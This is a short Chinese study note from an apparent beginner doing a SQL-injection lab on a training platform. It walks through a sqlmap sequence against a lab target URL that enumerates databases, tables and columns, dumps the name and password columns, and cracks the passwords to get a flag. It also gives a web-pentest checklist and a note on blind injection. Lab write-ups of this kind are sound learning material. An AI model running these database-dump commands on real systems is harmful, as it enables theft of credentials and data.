学习笔记
1月12日
使用某攻防平台中的靶机对sql的布尔盲注的学习进行了验证
进入靶场环境,给出一个网站的页面。
首先寻找注入点,小白刚入门不是很会,所以注入点找了一会,就在通知里面,然后使用sqlmap来跑很快就搞定了
sqlmap.py -u “http://219.153.49.228:40014/new_list.php?id=1” --dbs
sqlmap.py -u “http://219.153.49.228:40014/new_list.php?id=1” -D stormgroup --tables
sqlmap.py -u “http://219.153.49.228:40014/new_list.php?id=1” -D stormgroup -T member --columns
sqlmap.py -u “http://219.153.49.228:40014/new_list.php?id=1” -D stormgroup -T member -C name,password,status --dump
最后得到两个密码,解密后的密码登录系统就得到了Key
对web网站进行渗透思路
1.万能语法
2.通过sql注入 在url地址栏数日数据库的注入语法
3.暴力破解
4.burp抓包
5.xss、csrf
注入漏洞在owasp top10 排行第一
系统漏洞
sql注入:
sql注入漏洞就是后台对用户输入的内容没有做合法性的验证和判断,用户构造恶意的sql语法输入带入数据库,从而实现对数据库的操作
手工找漏洞:
经验:
1.找到注入点,如何找到注入点?
参数值传递的方法:
GET方法
POST方法
sql注入点:存在位置一定是一个动态页面,注入点一定是在参数的位置
学习内容:找到book网站的sql注入漏洞
盲注:是sql注入的一种,有两种方式:一种是布尔盲注,一种是时间盲注
方法:通过burpsuite抓包
信息收集:
数据库:mysql 5.0.12
语言:Php
系统:windows
中间件:PHP 5.4,Apache 2.4.23
爆库:
sqlmap.py -r 路径 --dbs
sqlmap.py -r 路径 -D 库名 --tables
sqlmap.py -r 路径 -D 库名 -T user --columns
sqlmap.py -r 路径 -D 库名 -T 表名 -C 列名,列名 --dump
sqlmap
1.python环境
2.sqlmap部署
任务:利用book的注入漏洞,拿到数据中的所有数据。